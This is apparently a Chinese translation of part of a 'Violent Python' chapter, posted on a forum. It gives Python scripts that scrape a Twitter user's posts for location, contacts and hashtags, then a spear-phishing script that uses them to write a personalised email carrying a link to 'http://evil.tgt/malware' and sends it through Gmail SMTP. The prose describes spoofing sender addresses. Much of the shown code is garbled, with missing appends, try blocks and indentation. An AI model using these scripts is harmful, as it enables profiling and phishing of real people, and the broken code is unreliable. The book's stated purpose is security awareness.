《Violent Python》第六章Web Recon with Python (2)中文版

  • A+


原作者:Chris Katsaropoulos





# coding=UTF-8

import json

import urllib

import optparse

from anonBrowser import *

def get_tweets(handle):

    query = urllib.quote_plus('from:' + handle+ ' since:2009-01-01 include:retweets')

    tweets = []

    browser = anonBrowser()


    response = browser.open('http://search.twitter.com/search.json?q='+ query)

    json_objects = json.load(response)

    for result in json_objects['results']:

        new_result = {}

        new_result['from_user'] = result['from_user_name']

        new_result['geo'] = result['geo']

        new_result['tweet'] = result['text']


    return tweets

def load_cities(cityFile):

    cities = []

    for line in open(cityFile).readlines():



    return cities

def twitter_locate(tweets,cities):

    locations = []

    locCnt = 0

    cityCnt = 0

    tweetsText = ""

    for tweet in tweets:

        if tweet['geo'] != None:


            locCnt += 1

            tweetsText += tweet['tweet'].lower()

    for city in cities:

        if city in tweetsText:



            print("[+] Found "+str(locCnt)+" locations via Twitter API and "+str(cityCnt)+" locations from text search.")

    return locations

def main():

    parser = optparse.OptionParser('usage%prog -u <twitter handle> [-c <list of cities>]')

    parser.add_option('-u', dest='handle', type='string', help='specify twitter handle')

    parser.add_option('-c', dest='cityFile', type='string', help='specify file containing cities to search')

    (options, args) = parser.parse_args()

    handle = options.handle

    cityFile = options.cityFile

    if (handle==None):

        print parser.usage


    cities = []

    if (cityFile!=None):

        cities = load_cities(cityFile)

        tweets = get_tweets(handle)

        locations = twitter_locate(tweets,cities)

        print("[+] Locations: "+str(locations))

if __name__ == '__main__':



recon:∼# cat mlb-cities.txt | more







recon:∼# python twitterGeo.py -u redsox -c mlb-cities.txt

[+] Found 0 locations via Twitter API and 1 locations from text


[+] Locations: ['toronto']

    recon:∼# python twitterGeo.py -u nationals -c mlb- cities.txt

[+] Found 0 locations via Twitter API and 1 locations from text


[+] Locations: ['denver']



# coding=UTF-8

import json

import re

import urllib

import urllib2

import optparse

from anonBrowser import *

def get_tweets(handle):

    query = urllib.quote_plus('from:' + handle+ ' since:2009-01-01 include:retweets')

    tweets = []

    browser = anonBrowser()


    response = browser.open('http://search.twitter.com/search.json?q=' + query)

    json_objects = json.load(response)

    for result in json_objects['results']:

        new_result = {}

        new_result['from_user'] = result['from_user_name']

        new_result['geo'] = result['geo']

        new_result['tweet'] = result['text']


    return tweets

def find_interests(tweets):

    interests = {}

    interests['links'] = []

    interests['users'] = []

    interests['hashtags'] = []

    for tweet in tweets:

        text = tweet['tweet']

        links = re.compile('(http.*?)\Z|(http.*?) ').findall(text)

        for link in links:

            if link[0]:

                link = link[0]

            elif link[1]:

                link = link[1]




                response = urllib2.urlopen(link)

                full_link = response.url




        interests['users'] += re.compile('(@\w+)').findall(text)

        interests['hashtags'] +=re.compile('(#\w+)').findall(text)




    return interests

def main():

    parser = optparse.OptionParser('usage%prog -u <twitter handle>')

    parser.add_option('-u', dest='handle', type='sring', help='specify twitter handle')

    (options, args) = parser.parse_args()

    handle = options.handle

    if handle == None:



    tweets = get_tweets(handle)

    interests = find_interests(tweets)

    print('\n[+] Links.')

    for link in set(interests['links']):

        print(' [+] ' + str(link))

        print('\n[+] Users.')

    for user in set(interests['users']):

        print(' [+] ' + str(user))

        print('\n[+] HashTags.')

    for hashtag in set(interests['hashtags']):

        print('\n[+] ' + str(hashtag))

if __name__ == '__main__':



recon:∼# python twitterInterests.py -u sonnench

[+] Links.


[+] Users.

    [+] @tomasseeger

    [+] @sonnench

    [+] @Benaskren

    [+] @AirFrayer

    [+] @NEXERSYS

[+] HashTags.

[+] #UFC148





# coding=UTF-8

import urllib

from anonBrowser import *

import json

import re

import urllib2

class reconPerson:

    def __init__(self, handle):

        self.handle = handle

        self.tweets = self.get_tweets()

    def get_tweets(self):

        query = urllib.quote_plus('from:' + self.handle+' since:2009-01-01 include:retweets')

        tweets = []

        browser = anonBrowser()


        response = browser.open('http://search.twitter.com/search.json?q=' + query)

        json_objects = json.load(response)

        for result in json_objects['results']:

            new_result = {}

            new_result['from_user'] = result['from_user_name']

            new_result['geo'] = result['geo']

            new_result['tweet'] = result['text']


        return tweets

    def find_interests(self):

        interests = {}

        interests['links'] = []

        interests['users'] = []

        interests['hashtags'] = []

        for tweet in self.tweets:

            text = tweet['tweet']

            links = re.compile('(http.*?)\Z|(http.*?) ').findall(text)

            for link in links:

                if link[0]:

                    link = link[0]

                elif link[1]:

                    link = link[1]



                response = urllib2.urlopen(link)

                full_link = response.url




        interests['users'] +=re.compile('(@\w+)').findall(text)

        interests['hashtags'] +=re.compile('(#\w+)').findall(text)




        return interests

    def twitter_locate(self, cityFile):

        cities = []

        if cityFile != None:

            for line in open(cityFile).readlines():

                city = line.strip('\n').strip('\r').lower()


                locations = []

                locCnt = 0

                cityCnt = 0

                tweetsText = ''

        for tweet in self.tweets:

            if tweet['geo'] != None:


                locCnt += 1

                tweetsText += tweet['tweet'].lower()

        for city in cities:

            if city in tweetsText:


                cityCnt += 1

        return locations








import smtplib

from email.mime.text import MIMEText

def sendMail(user,pwd,to,subject,text):

    msg = MIMEText(text)

    msg['From'] = user

    msg['To'] = to

    msg['Subject'] = subject


        smtpServer = smtplib.SMTP('smtp.gmail.com', 587)

        print("[+] Connecting To Mail Server.")


        print("[+] Starting Encrypted Session.")



        print("[+] Logging Into Mail Server.")

        smtpServer.login(user, pwd)

        print("[+] Sending Mail.")

        smtpServer.sendmail(user, to, msg.as_string())


        print("[+] Mail Sent Successfully.")


        print("[-] Sending Mail Failed.")

user = 'username'

pwd = 'password'

sendMail(user, pwd, '[email protected]', 'Re: Important', 'Test Message')


recon:# python sendMail.py

[+] Connecting To Mail Server.

[+] Starting Encrypted Session.

[+] Logging Into Mail Server.

[+] Sending Mail.

[+] Mail Sent Successfully.


垃圾邮件的发送者使用相同的技术发送邮件来自[email protected][email protected] 可疑地址邮件,我们可以伪造邮件的发送地址是关键。使用客户端打开,打开转发功能,是攻击者从一个看起来值得信奈的地址发送邮件,增加用户点开邮件的可能性。

用Smtplib进行鱼叉式网络钓鱼 将我们所有的研究放在一起是我们最后的阶段。在这里,我们的脚本创建了一个看起来像目标朋友发来的电子邮件,目标发现一些有趣的事情,邮件看起来是真人写的。大量的研究投入到帮助电脑的的交流看起来更像人,各种各样的方法任然在完善。为了减少这种可能性,我们将创建一个包含攻击荷载的的简单的信息邮件。程序的几个部分之一将涉及选择包含这条信息。我们的程序将按数据随机的选择。采取地步骤是:选择虚假的发件人地址,制作一个主题,创建一个信息,然后发送电子邮件。幸运的是创建发送人和主题是相当的简单。

代码的if语句仔细的处理和如何将短信息连接在一起是很重要的问题。当处理数量巨大的可能性时,在我们的侦查中将使用更多情况的代码,每一个可能性会被分为独立的函数。每一个方法将以特定的的方法承担一块的开始和结束,然后独立与其他代码的操作。这样,收集到某人的信息就越多,唯一改变的是方法。最后一步是通过我们的电子邮件客户端,相信它的人愚蠢的做剩下的活。这个过程的没一部分在这一章中都讨论过,这是任何被用来获取权限的钓鱼网站的产物。在我们的例子中,我们简单的发送一个名不副实的链接,有效荷载可以是附件或者是诈骗网站,或者任何其他的攻击方法。这个过程将对每一个成员重复,只要一个人上当攻击者就能获取权限。 我们特定的脚本将攻击一个用户基于他公开的信息。基于他的地点,用户,Hash标签,链接,脚本将创建一个附带恶意链接的邮件等待用户点击。

# coding=UTF-8 import smtplib import optparse from email.mime.text import MIMEText from twitterClass import * from random import choice

def sendMail(user,pwd,to,subject,text):     msg = MIMEText(text)     msg['From'] = user     msg['To'] = to     msg['Subject'] = subject     try:         smtpServer = smtplib.SMTP('smtp.gmail.com', 587)         print("[+] Connecting To Mail Server.")         smtpServer.ehlo()         print("[+] Starting Encrypted Session.")         smtpServer.starttls()         smtpServer.ehlo()         print("[+] Logging Into Mail Server.")         smtpServer.login(user, pwd)         print("[+] Sending Mail.")         smtpServer.sendmail(user, to, msg.as_string())         smtpServer.close()         print("[+] Mail Sent Successfully.")     except:         print("[-] Sending Mail Failed.")

def main():     parser = optparse.OptionParser('usage%prog -u <twitter target> -t <target email> -l <gmail login> -p <gmail password>')     parser.add_option('-u', dest='handle', type='string', help='specify twitter handle')     parser.add_option('-t', dest='tgt', type='string', help='specify target email')     parser.add_option('-l', dest='user', type='string', help='specify gmail login')     parser.add_option('-p', dest='pwd', type='string', help='specify gmail password')     (options, args) = parser.parse_args()     handle = options.handle     tgt = options.tgt     user = options.user     pwd = options.pwd     if handle == None or tgt == None or user ==None or pwd==None:         print(parser.usage)         exit(0)     print("[+] Fetching tweets from: "+str(handle))     spamTgt = reconPerson(handle)     spamTgt.get_tweets()     print("[+] Fetching interests from: "+str(handle))     interests = spamTgt.find_interests()     print("[+] Fetching location information from: "+ str(handle))     location = spamTgt.twitter_locate('mlb-cities.txt')     spamMsg = "Dear "+tgt+","     if (location!=None):         randLoc=choice(location)         spamMsg += " Its me from "+randLoc+"."     if (interests['users']!=None):         randUser=choice(interests['users'])         spamMsg += " "+randUser+" said to say hello."     if (interests['hashtags']!=None):         randHash=choice(interests['hashtags'])         spamMsg += " Did you see all the fuss about "+ randHash+"?"     if (interests['links']!=None):         randLink=choice(interests['links'])         spamMsg += " I really liked your link to: "+randLink+"."     spamMsg += " Check out my link to http://evil.tgt/malware"     print("[+] Sending Msg: "+spamMsg)     sendMail(user, pwd, tgt, 'Re: Important', spamMsg)

if __name__ == '__main__':     main()

测试我们的脚本,我们可以获得一些关于Boston Red Sox的信息,从他的Twitter账户上,为了发送一个恶意的垃圾邮件。

recon# python sendSpam.py -u redsox -t target@tgt -l username -p password [+] Fetching tweets from: redsox [+] Fetching interests from: redsox [+] Fetching location information from: redsox [+] Sending Msg: Dear redsox, Its me from toronto. @davidortiz said     to say hello. Did you see all the fuss about #SoxAllStars? I really     liked your link to:http://mlb.mlb.com. Check out my link to http://     evil.tgt/malware [+] Connecting To Mail Server. [+] Starting Encrypted Session. [+] Logging Into Mail Server. [+] Sending Mail. [+] Mail Sent Successfully.

本章总结 虽然这个方法不是用于另一个人或者组织,但它对认识其可行性和组织的脆弱性很重要。Python和其他脚本语言允许程序员快速的创建一个方法,使用从互联网上找到的广阔的资源,来获取潜在的利益。在我们的代码中,我创建了一个类来模拟浏览器同时增加了匿名访问,检索网站,使用强大的Google,利用Twitter来了解目标的更多信息功能,然后把所有的细节发送一个特殊的电子邮件给目标用户。互联网的连接速度限制了程序,线程的某些函数将大大的减少执行时间。此外,一旦我们学会了如何从数据源中检索信息,对其他网站做同样的信息是很简单的。个人美誉访问和处理互联网上大量的信息的能力,但是强大的Python和它的库允许访问每一个资源的能力远远高于几个熟练的人员。知道这一切,攻击不是你想象中的那么复杂,你的组织是如何的脆弱?什么公开的信息可以被攻击者使用?你会成为一个Python检索信息和恶意邮件的受害者吗?

译者的话: 下周同一时间,敬请期待《Violent Python》最终章节!同时,我们会在最后把这本书翻译的原稿分享给大家,欢迎关注!

  1. 1#

    crown丶prince (我用双手成就你的梦想) | 2015-11-01 12:41

    下周同一时间,敬请期待《Violent Python》最终章节!同时,我们会在最后把这本书翻译的原稿分享给大家,欢迎关注!

  2. 2#

    J0kER (姿势决定成败) | 2015-11-03 15:14


  3. 3#

    LoveSnow (我要努力,争取开发自己的神器) | 2015-11-05 11:19
